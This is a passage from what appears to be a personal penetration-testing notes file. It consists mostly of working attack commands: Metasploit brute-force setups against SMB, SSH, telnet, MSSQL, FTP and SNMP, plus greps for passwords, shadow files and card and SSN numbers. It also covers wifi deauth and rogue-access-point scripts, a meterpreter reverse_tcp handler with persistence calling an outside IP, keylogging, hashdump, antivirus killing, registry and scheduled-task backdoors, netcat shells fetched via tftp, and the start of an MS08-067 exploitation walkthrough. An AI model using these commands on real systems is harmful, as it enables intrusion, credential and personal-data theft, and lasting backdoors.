3149# also set RHOSTS file://bla
3150# set USER_FILE "C:/backup/wordlist/password_large.txt"
3151set USERPASS_FILE "C:/backup/wordlist/root_userpass.txt"
3152set VERBOSE true
3153set STOP_ON_SUCCESS true
3154set BRUTEFORCE_SPEED 5
3155# set this to the number of host
3156set THREADS 6
3157
3158run
3159
3160use auxiliary/gather/dns_enum
3161set DOMAIN domain.com
3162run
3163#smb
3164
3165use auxiliary/scanner/smb/smb_login
3166
3167set RHOSTS file://192.168.8.39
3168set RHOSTS 127.0.0.1
3169
3170set USER_FILE "C:/wordlist/users.txt"
3171set PASS_FILE "C:/wordlist/2.txt"
3172set VERBOSE false
3173# set to number of host scanning .
3174set THREADS 16
3175
3176set STOP_ON_SUCCESS true
3177set VERBOSE false
3178 Name Value
3179 ---- -----
3180 BLANK_PASSWORDS false
3181 BRUTEFORCE_SPEED 5
3182 ConnectTimeout 10
3183 DCERPC::ReadTimeout 10
3184 DCERPC::fake_bind_multi true
3185 DCERPC::fake_bind_multi_append 0
3186 DCERPC::fake_bind_multi_prepend 0
3187 DCERPC::max_frag_size 4096
3188 DCERPC::smb_pipeio rw
3189 MaxGuessesPerService 0
3190 MaxGuessesPerUser 0
3191 MaxMinutesPerService 0
3192 NTLM::SendLM true
3193 NTLM::SendNTLM true
3194 NTLM::SendSPN true
3195 NTLM::UseLMKey false
3196 NTLM::UseNTLM2_session true
3197 NTLM::UseNTLMv2 true
3198 PRESERVE_DOMAINS true
3199 REMOVE_PASS_FILE false
3200 REMOVE_USERPASS_FILE false
3201 REMOVE_USER_FILE false
3202 RHOST file:/home/rmccurdy/high
3203
3204# http
3205
3206use auxiliary/scanner/http/http_login
3207set AUTH_URI /folder?dcPath=ha-datacenter
3208set RHOSTS 127.0.0.1 127.0.0.1 127.0.0.1
3209set VERBOSE true
3210run
3211back
3212
3213# telnet
3214use auxiliary/scanner/telnet/telnet_login
3215set RHOSTS 127.0.0.1,49,50
3216
3217set PASS_FILE "C:/wordlist/password_small.txt"
3218set THREADS 254
3219run
3220
3221back
3222# mssql
3223use auxiliary/scanner/mssql/mssql_login
3224set RHOSTS 127.0.0.1
3225set PASS_FILE "C:/wordlist/password_small.txt"
3226set USERNAME sa
3227set VERBOSE false
3228run
3229back
3230
3231
3232
3233#ftp
3234use auxiliary/scanner/ftp/ftp_login
3235set RHOSTS 127.0.0.1
3236set PASS_FILE /home/administrator/small.txt
3237set USER_FILE /home/administrator/small.txt
3238set BRUTEFORCE_SPEED 1
3239run
3240
3241#snmp
3242use auxiliary/scanner/snmp/snmp_login
3243set RHOSTS 127.0.0.1
3244set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
3245set VERBOSE false
3246
3247run
3248
3249nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n
3250./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179
3251# got r00t got r00t ?
3252
3253# ref http://en.wikipedia.org/wiki/Setuid
3254# find Setuid world writable files
3255find / \( \( -perm -4000 -o -perm -2000 -type f \) -and \( -perm -0002 -o -perm -0020 \) \) -type f -ls
3256
3257
3258# search home for passwords ..
3259cd /home
3260grep -iar password * -A 1 -B 1 |strings >/tmp/home_pass;less /tmp/home_pass
3261
3262# search a path for READ accesss using file command
3263find . -maxdepth 5 -exec file '{}' \; | grep -v "no read" | grep -v directory >/tmp/mnt
3264
3265# bash history very gooOOOd !
3266updatedb;locate .bash_history
3267
3268# crack with extrem gpu brute force
3269cat /etc/shadow | grep -v ":\*:"
3270# use on other servers by checking bash history
3271updatedb;locate authorized
3272
3273# find files modifyed the past 7 days
3274find / -type f -mtime -7|egrep -v "(proc|\/sys)"
3275
3276# you can look for other file types sql,*.php,*sql.tar.gz,*pass*,sudousers,/etc/passwd,/root/.ssh or ~/.ssh,password
3277locate *.sql
3278locate sql.tar.gz
3279# what services are listing the part at the top
3280netstat -na | grep LIS
3281lsof -nPi
3282
3283
3284
3285# Search office documents for PII
3286# CC with SSN no dash ( high false positive )
3287find . -iname "*.???x" -type f -exec unzip -p '{}' '*' \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b|\b[0-9]{9}\b"
3288
3289# CC with SSN dash ( low false positive only match ###-##-#### not any 8digi number )
3290find . -iname "*.???x" -type f -exec unzip -p '{}' '*' \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b"
3291
3292
3293
3294
3295# find config files with company names in them
3296find . -type f -size -1000000 -exec grep -B 3 -A 3 -Hi COMPANYNAMEHERE '{}' \; > grep_config_companyname.txt
3297
3298# find config files with Internal IP space in them
3299find . -type f -size -1000000 -exec grep -Hi -B 3 -A 3 \b(10|172|192)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b '{}' \; > grep_config_internalip.txt
3300
3301# grep LARGE ! files in this case sql files with company name
3302find . -type f *.sql -exec grep -Hi -B 3 -A 3 COMPANYNAMEHERE '{}' \; > grep_config_internalip.txt
3303
3304
3305---------
3306
3307more notes :
3308-------------
3309# class b ADDfff -Pn to not ping ( assume up and no ping scan, it will take longer ) use control + D to end script and save at job
3310# this will run at 7pm in a screen so you can reattach / check status and Ctrl+c out to save and use nmap -r to resume if need be
3311at 19:00
3312screen bash at.sh
3313# at.sh script
3314nmap -T5 -p 20,21,80,115,443,989,990 -vvvv -sS -n --max-rtt-timeout 300ms --max-retries 1 192.159.0.0/16 -oA /home/administrator/rmccurdy/safg/192.159.0.0_fast_ping
3315# class b external 65k host fast ping scan 7 ports 30min
3316# Nmap 5.61TEST2 scan initiated Thu Dec 29 21:02:11 2011 as: nmap -T5 -p 20,21,80,115,443,989,990 -vvvv -sS -n --max-rtt-timeout 300ms --max-retries 1 -oA /home/administrator/rmccurdy/safg/192.30.0.0_fast_ping 192.30.0.0/16
3317# Ports scanned: TCP(7;20-21,80,115,443,989-990) UDP(0;) SCTP(0;) PROTOCOLS(0;)
3318# Nmap done at Thu Dec 29 21:29:10 2011 -- 65536 IP addresses (40675 hosts up) scanned in 1618.92 seconds
3319
3320nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=zonetransfer.me -p 53 ns12.zoneedit.com
3321for i in `cat 1` ; do curl http://api.hackertarget.com/zonetransfer/?q=$i;done
3322
3323
3324# medusa hydra
3325./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179
3326
3327
3328http://www.foofus.net/~jmk/medusa/medusa.html
3329medusa -M ftp -H targets -u Anonymous -p input_file -v 6 -T 30 -g 2 -R 1
3330medusa -M mysql -H # change the -T for more threds -t is for per host keep it 1 ..
3331medusa -M ssh -H 22 -u root -p tcr1tt3r -v 6 -g 2 -R 1 -t 1 -T 1
3332medusa -h 192.168.1.103 -u administrator -P passwords.txt -e ns -M smbnt
3333
3334
3335mysql -u root -P mysqlpass.txt -v 6 -T 1 -g 2 -R 1
3336nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n
3337
3338# email over telnet
3339RSET
3340HELO
3341MAIL FROM:<root@whatismyip.com>
3342RCPT TO:<"freeload101@yahoo.com">
3343data
3344this is a test from w00t
3345.
3346--------
3347route add 10.101.14.0 netmask 255.255.255.0 gw 10.101.13.1 dev eth05
3348
3349.\nmap -script smb-check-vulns.nse --script-args=unsafe=1 -p445 10.104.101.59
3350.\nmap --script smb-enum-shares.nse -p445 10.104.101.59
3351.\nmap --script smb-enum-users.nse -p445 10.104.101.59
3352.\nmap.exe --script smtp-commands.nse -pT:25,465,587
3353.\nmap.exe --script smtp-enum-users.nse -pT:25,465,587
3354 a
3355
3356# sid enum using nmap and metasploits sid.txt 1307 sids in ~8 seconds
3357nmap -n --script=oracle-sid-brute -p 1521-1560 192.168.1.141
3358
3359# try 1255 user/pass
3360# requires valid SID ( default is XE )
3361# Performed 1245 guesses in 3 seconds, average tps: 415
3362nmap --script oracle-brute -p 1521-1560 --script-args oracle-brute.sid=XE -n 192.168.1.141
3363
3364# oracle shell using OAT Oracle Audit Tool
3365ose.bat -s 192.168.1.141 -u SYS -p CHANGE_ON_INSTALL -d XE -t Windows
3366
3367# route all to 10.127.120.97
3368route add 0.0.0.0 mask 0.0.0.0 10.127.120.97
3369# route 75.131.211.0 to VPN or other connectoin
3370route add 75.131.211.0 mask 255.255.255.0 192.168.77.254
3371# route rmccurdy over VPN
3372route add 75.131.211.0 mask 255.255.255.0 10.31.128.1
3373
3374
3375warvox notes:
3376* you also have to contact support and have IAX unlocked on the account
3377· Normally I have 3 max threads and set it for 15-20 sec then with sql get the completed = 0 and run them thought again with 53 sec ringtime.
3378· Let me know if you need any help
3379google warvox for general notes "login etc .. just read all of it please ... use vitelity as the provider )
33803 at a time max ..
3381screen
3382ruby warvox.rb ( run warvox in screen so you can screen -r if you get dropped google screen Manuel ... )
3383use SELF as the caller ID
3384ranges are 15555555555:15555555555
3385or 155555XXX
3386
3387
3388SELECT * FROM DIAL_RESULTS where completed = 'f' and dial_job_id >= '68' and busy = 'f' and ringtime <= '52';
3389* if don.t add the .and ringtime <= '52' I get 2K hits . I would assume this is because it if did not answer it labeled it as not completed instead of labeling it timeout for some reason ?
3390* ~700 ringtime <= '52' with no data file... some high ringtimes but most were instant busy signal but not marked as complete or busy with no data file
3391SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'voice' ;
3392SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'fax' ;
3393SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'modem' ;
3394SELECT * FROM DIAL_RESULTS where dial_job_id = '110' and busy = 't';
3395
3396
3397rcracki_mt /s2/LM/lm_alpha-numeric-symbol32-space#1-7_* -f /usr/local/sbin/hash
3398rcrack /s2/LM/lm_alpha-numeric-symbol32-space#1-7_* -f hash2
3399# example input file 4ee is null or blank
3400# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
3401#notes
3402http://ob-security.info/?tag=hashcat
3403
3404
3405
3406
3407
3408wget -O giskismet-0.02.tar.gz \
3409"http://my-trac.assembla.com/giskismet/browser/tags/giskismet-0.02.tar.gz?format=raw"
3410tar -xzvf giskismet-0.02.tar.gz
3411rm giskismet-0.02.tar.gz
3412
3413We need a few packages first.
3414
3415apt-get update
3416apt-get install libxml-libxml-perl libdbi-perl libdbd-sqlite3-perl -y
3417
3418Do the install
3419
3420
3421cd giskismet-0.02
3422perl Makefile.PL
3423make
3424make install
3425
3426
3427
3428giskismet -x wardrive.netxml
3429giskismet -q "select * from wireless" -o output.kml
3430
3431
3432giskismet -q 'select * from wireless where ESSID like "_%"' wireless.dbl -o ouput2.kml
3433
3434
3435Before we map our dat
3436
3437# following steps are for BT4:
3438# edit the kismet.conf and add the /dev/ttyUSB0 etc .. (find / -name kismet.conf )
3439# load the kernal mod for garmin gps
3440modprobe garmin_gps
3441# plugin the the garmion GPS18 USB puck
3442# if I dont run this command it hangs and kill -9 will not even work so have to reboot
3443mount -t usbfs none /proc/bus/usb/
3444# setup gpsd shoud show changy bits so you know it is trying to lock !
3445dpkg-reconfigure gpsd
3446#start gpsd
3447/etc/init.d/gpsd stop
3448gpsd -N -n -D 2 /dev/ttyUSB0
3449# test
3450ls -al /dev/ttyUSB0
3451xgps
3452#also test by
3453telnet localhost 2947
3454# in kismet you will get nodata untill it has a lock ( this took upto 500seconds in xgps ) you can run XGPS and KISMET at the same time.
3455
3456/etc/init.d/wicd stop
3457/etc/init.d/networking stop
3458killall dhclient dhcpcd
3459
3460
3461
3462Ubuntu Packages - For whatever reason, Ubuntu has stopped updating Kismet in their repositories.
3463
3464To add Kismet as a repository and get updates automatically, add the following to your /etc/apt/sources.lst or to /etc/apt/sources.list.d/kismet.list:
3465
3466 For Ubuntu Oneiric (11.10): deb https://www.kismetwireless.net/code/ oneiric kismet
3467 For Ubuntu Precise (12.04): deb https://www.kismetwireless.net/code/ precise kismet
3468 For Ubnutu Quantal (12.10): deb https://www.kismetwireless.net/code/ quantal kismet
3469
3470
3471 To add the Kismet signing key (signed by my primary key, available above) to your trusted keys:
3472
3473 curl https://www.kismetwireless.net/code/dists/kismet-release.gpg | sudo apt-key add -
3474
3475# ssh logins
3476use auxiliary/scanner/ssh/ssh_login
3477set RHOSTS 10.13.102.2,177
3478set USER_FILE "C:/wordlist/password_small.txt"
3479set RHOSTS_FILE "C:/wordlist/targests.txt"
3480run
3481back
3482use auxiliary/gather/dns_enum
3483set DOMAIN 10.21.1.69
3484run
3485
3486
3487
3488
3489
3490--------------------------------------
3491
3492airbase notes
3493------------
3494mass deauth
3495# broken because you need listen on the right channel before you deauth ... so I need channel and sesstion and ap info all in one line ..
3496# cleanup
3497rm -f clients*.csv
3498# dump clients
3499airodump-ng mon0 -o csv -w clients &
3500# lets sleep on it we need station ids
3501sleep 60
3502killall airodump-ng
3503# make script to mass deauth
3504grep -ia -A 10000 Station clients*.csv |egrep -v "(not|Station)" | sed 's/,/ /g' | awk '{print "aireplay-ng -0 1 -a",$8,"mon0 --ignore-negative-one -c",$1}'|grep : > killclients
3505bash -x killclients
3506-----------------------------------------------
3507gogogo
3508----------------
3509^Croot@bt:/stuff/airbase# cat GO
3510
3511killall avahi-daemon avahi-daemon NetworkManager wpa_supplicant
3512killall dhcpd3 dhclient dhclient3 dhcpcd dhcpd
3513airmon-ng start wlan1
3514sleep 5
3515xterm -e "airbase-ng -c 6 -P mon0 -v" &
3516sleep 5
3517ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 &
3518dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 &
3519sleep 5
3520cd /pentest/exploits/framework &
3521xterm -e "tcpdump -i at0 -n port 67 and port 68" &
3522sleep 5
3523xterm -e "/pentest/exploits/framework/msfconsole -r /pentest/exploits/framework/karma.rc"
3524------------------
3525# depends for airdcrack
3526
3527apt-get install build-essential -y
3528apt-get install libssl-dev -y
3529apt-get install openssl-dev -y
3530apt-get install partimage gparted lynx links curl nmap iotop screen medusa trafshow wireshark -y --force-yes
3531# more depends set autopwn
3532apt-get install upx-ucl upx-nrv -y
3533apt-get install build-essential ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby libgtk2-ruby libglade2-ruby subversion sqlite3 libsqlite3-ruby irb -y
3534apt-get install ruby libruby rdoc -y
3535apt-get install libyaml-ruby -y
3536apt-get install libzlib-ruby -y
3537apt-get install libopenssl-ruby -y
3538apt-get install libdl-ruby -y
3539apt-get install libreadline-ruby -y
3540apt-get install libiconv-ruby -y
3541apt-get install rubygems -y
3542
3543#apt-get install postgresql postgresql-client postgresql-contrib -y
3544apt-get install pgadmin3 -y
3545apt-get install python-pymssql -y
3546gem1.8 install rails
3547# get set and msf
3548mkdir /pentest/
3549mkdir /pentest/exploits
3550cd /pentest/exploits
3551# check out /install aircrack latest
3552svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
3553cd aircrack-ng
3554make clean
3555make
3556make install
3557airodump-ng-oui-update
3558# create mon0
3559airmon-ng start wlan1
3560# start airbase on mon0 it creates at0 to us with dhcpd ! ( may not need to include channel ... )
3561airbase-ng -c 6 -P mon0 -v
3562# install dhcp3 server
3563apt-get install dhcp3-server -y
3564-----------------------------------------------------------
3565# DHCP CONF
3566cat /etc/dhcp3/dhcpd.conf
3567----------------------------------------------------------------
3568option domain-name-servers 10.0.0.1;
3569default-lease-time 60;
3570max-lease-time 72;
3571ddns-update-style none;
3572authoritative;
3573log-facility local7;
3574subnet 10.0.0.0 netmask 255.255.255.0 {
3575range 10.0.0.100 10.0.0.254;
3576option routers 10.0.0.1;
3577option domain-name-servers 10.0.0.1;
3578}
3579-------------------------------------------------------------------------------
3580# setup at0 interface that airbase created to listen on IP configured for dhcp server
3581ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
3582# start dhcp server
3583dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
3584# cd to framework root ..
3585cd /pentest/exploits/framework
3586wget http://digitaloffense.net/tools/karma.rc -O karma.rc
3587# start msfconsole using the mass client sides basicly karma.rc
3588msfconsole -r karma.rc
3589# start TCP dump looking for DHCP requests from the remote host !
3590tcpdump -i at0 -n port 67 and port 68
3591# mass client side too buggy ... to many iframes ... come back to it ... try SMB_REPLAY attack ...? or limit client side attacks ?
3592# for mass client side attack using etterfilter for targets:
3593apt-get install ettercap -y
3594# run mass client side attack
3595cd /pentest/exploits/fasttrack
3596fast-track.py -i
3597# choose mass client side attack etc and run metasploitloadfile manuely ...
3598# when all is running etc .... start msfconsole with the metasploitloadfile script in the base folder of fasttrack
3599msfconsole -r metasploitloadfile
3600http://digitaloffense.net/tools/karma.rc
3601+-+-+-
3602airmon-ng start wlan0
3603airbase-ng -c 9 -P -C60 -z 2 -W 1 mon0
3604ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
3605 dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan0
3606killall dhclient dhcpcd dhclient3
3607airmon-ng start wlan1
3608airbase-ng -c 9 -P -C60 -z 2 -W 1 mon1
3609ifconfig wlan1 up 10.0.0.1 netmask 255.255.255.0
3610dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan1
3611iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
3612iptables --append FORWARD --in-interface at0 -j ACCEPT
3613echo 1 > /proc/sys/net/ipv4/ip_forward
3614#airbase-ng -c 9 -P -C60 -z 2 -W 1 mon1
361500:0C:43:41:46:34 -37 13 2 0 6 54e. WPA TKIP PSK rmccurdyDOTcom1
3616
3617airbase-ng -c 6 -a 00:0C:43:41:46:34 -C60 -z 2 -W 1 -v --essid rmccurdyDOTcom1 mon0
3618dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan1
3619i
3620dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
3621tcpdump -i at0 -n port 67 and port 68
3622 armatage
3623apt-get install -y postgresql
3624apt-get install libpq-dev -y
3625gem install postgres
3626
3627/etc/init.d/postgresql start
3628
3629
3630
3631su -
3632su - postgres
3633
3634
3635createuser msf_user -P
3636createdb --owner=msf_user msf
3637
3638/pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
3639/pentest/exploits/framework/armitage
3640wifi notes
3641------------------------
3642internet@rmccurdydotcom /cygdrive/c/temp
3643# egrep "BSSID|<manuf>|<max_signal_dbm>|<ssid>" "Kismet-20110929-11-17-47-1.net
3644xml" | tr -d '\n' | awk '{gsub("<BSSID>",",\n"); print}' | sed -e 's/<\/BSSID>
3645/,/g' -e 's/ <manuf>//g' -e 's/<\/manuf>//g' -e 's/ <max_signal_dbm>/,/
3646g' -e 's/<\/max_signal_dbm>/,/'g -e 's/ <ssid>/,/g' -e 's/<\/ssid>//
3647g'> 2.csv
3648internet@rmccurdydotcom /cygdrive/c/temp
3649# load the kernal mod for garmin gps
3650modprobe garmin_gps
3651# plugin the the garmion GPS18 USB puck
3652# if I dont run this command it hangs and kill -9 will not even work so have to reboot
3653mount -t usbfs none /proc/bus/usb/
3654# setup gpsd
3655dpkg-reconfigure gps
3656# test
3657ls -al /dev/ttyUSB0
3658xgps
3659#also test by
3660telnet localhost 2947
3661# in kismet you will get nodata untill it has a lock ( this took upto 500seconds in xgps ) you can run XGPS and KISMET at the same time.
3662
3663------------------------
3664
3665
3666
3667
3668----------------------
3669
3670use exploit/multi/handler
3671set PAYLOAD windows/meterpreter/reverse_tcp
3672set LHOST rmccurdy.com
3673set LPORT 21
3674set ExitOnSession false
3675# set AutoRunScript pathto script you want to autorun after exploit is run
3676set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
3677
3678exploit -j -z
3679
3680
3681
3682# file_autopwn
3683rm -Rf /tmp/1
3684mkdir /tmp/1
3685rm -Rf ~/.msf3
3686
3687wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf
3688
3689./msfconsole
3690
3691db_driver sqlite3
3692db_create pentest11
3693setg LHOST 75.139.158.51
3694setg LPORT 21
3695setg SRVPORT 21
3696setg LPORT_WIN32 21
3697
3698setg INFILENAME /tmp/file3.pdf
3699
3700
3701use auxiliary/server/file_autopwn
3702
3703set OUTPATH /tmp/1
3704
3705set URIPATH /msf
3706set SSL true
3707set ExitOnSession false
3708set PAYLOAD windows/meterpreter/reverse_tcp
3709setg PAYLOAD windows/meterpreter/reverse_tcp
3710set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
3711run
3712
3713
3714
3715# shows all the scripts
3716run [tab]
3717
3718# persistence! broken ...if you use DNS name ..
3719run persistence -r 75.139.158.51 -p 21 -A -X -i 30
3720# new method run persistence -U -i 5 -p 443 -r 192.168.1.71
3721
3722run get_pidgin_creds
3723
3724idletime
3725sysinfo
3726
3727
3728# SYSTEM SHELL ( pick a proc that is run by system )
3729migrate 376
3730shell
3731
3732# session hijack tokens
3733use incognito
3734impersonate_token "NT AUTHORITY\\SYSTEM"
3735
3736# eslcate to system
3737use priv
3738getsystem
3739
3740
3741execute -f cmd.exe -H -c -i -t
3742execute -f cmd.exe -i -t
3743
3744# list top used apps
3745run prefetchtool -x 20
3746
3747# list installed apps
3748run prefetchtool -p
3749
3750run get_local_subnets
3751
3752# find and download files
3753run search_dwld "%USERPROFILE%\\my documents" passwd
3754run search_dwld "%USERPROFILE%\\desktop passwd
3755run search_dwld "%USERPROFILE%\\my documents" office
3756run search_dwld "%USERPROFILE%\\desktop" office
3757
3758# alternate
3759download -r "%USERPROFILE%\\desktop" ~/
3760download -r "%USERPROFILE%\\my documents" ~/
3761
3762# alternate to shell not SYSTEM
3763# execute -f cmd.exe -H -c -i -t
3764
3765
3766# does some run wmic commands etc
3767run winenum
3768
3769
3770
3771# rev shell the hard way
3772run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
3773
3774# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
3775run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
3776run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
3777
3778# vnc / port fwd for linux
3779run vnc
3780
3781# priv esc
3782run kitrap0d
3783
3784
3785
3786run getgui
3787
3788# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
3789run killav
3790
3791run winemun
3792
3793run memdump
3794
3795run screen_unlock
3796
3797upload /tmp/system32.exe C:\\windows\\system32\\
3798reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
3799reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
3800reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
3801reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
3802reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
3803reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
3804upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
3805
3806
3807
3808
3809getuid
3810ps
3811getpid
3812keyscan_start
3813keyscan_dump
3814migrate 520
3815portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
3816portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
3817
3818shell
3819run myremotefileserver_mserver -h
3820run myremotefileserver_mserver -p 8787
3821
3822run msf_bind
3823run msf_bind -p 1975
3824rev2self
3825getuid
3826
3827getuid
3828
3829
3830
3831enumdesktops
3832grabdesktop
3833
3834run deploymsf -f framework-3.3-dev.exe
3835
3836run hashdump
3837run metsvc
3838run scraper
3839run checkvm
3840run keylogrecorder
3841run netenum -fl -hl localhostlist.txt -d google.com
3842run netenum -rl -r 10.192.0.50-10.192.0.254
3843run netenum -st -d google.com
3844run netenum -ps -r 10.192.0.50-254
3845
3846
3847# Windows Login Brute Force Meterpreter Script
3848run winbf -h
3849
3850# upload a script or executable and run it
3851uploadexec
3852
3853
3854# Using Payload As A Backdoor from a shell
3855
3856REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
3857at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
3858SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
3859
3860
3861
3862# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
3863catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
3864catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
3865catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
3866
3867# Nessus log watch
3868watch -n 20 -d 'tail -10 /opt/nessus/var/nessus/logs/nessusd.messages|grep -v "not an error"'
3869
3870Nessus Scanning through a Metasploit Meterpreter Session
3871By
3872Mark Baggett
3873on March 16, 2010 6:44 AM | Permalink
3874
3875By Mark Baggett
3876
3877Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.
3878
3879The Players
3880Attacker 172.16.186.132
3881Victim 172.16.186.126
3882
3883Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.
3884
3885Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:
3886
3887meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22
3888
3889This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).
3890
3891
3892Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:
3893
3894# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132
3895
3896This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.
3897
3898Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:
3899
3900# proxychains /usr/sbin/nessusd -D
3901
3902Step 5 - Start the nessus client and do you scan.
3903
3904Preparing for a custom command line OpenSSH Installation in your lab
3905
3906The basic steps to prepare a command line OpenSSH installation for Windows are as follows:
3907
39081. Download the setupssh.exe installation package from http://sshwindows.sourceforge.net/download
3909
39102. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH
3911
39123. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.
3913
39144. Export the following registry keys using the REG EXPORT command as follows:
3915
3916REG EXPORT .HKLM\SOFTWARE\Cygnus Solutions. 1.REG
3917REG EXPORT .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. 2.REG
3918REG EXPORT .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. 3.REG
3919
39205. Concatenate all of these registry files together into one file.
3921TYPE 1.REG 2.REG 3.REG >OPENSSH.REG
3922
39236. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.
3924
3925
3926Performing an installation via command shell
3927
3928Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.
3929
3930Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.
3931
3932
3933Exploiting the Vulnerability
3934
3935[root@localhost framework-3.2]# nc -v 192.168.1.40 445
3936Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded!
3937[root@localhost framework-3.2]# ./msfconsole
3938
3939msf > search exploits ms08_067
3940[*] Searching loaded modules for pattern 'ms08_067'...
3941Exploits
3942========
3943Name Description
3944---- -----------
3945windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
3946msf > use windows/smb/ms08_067_netapi
3947
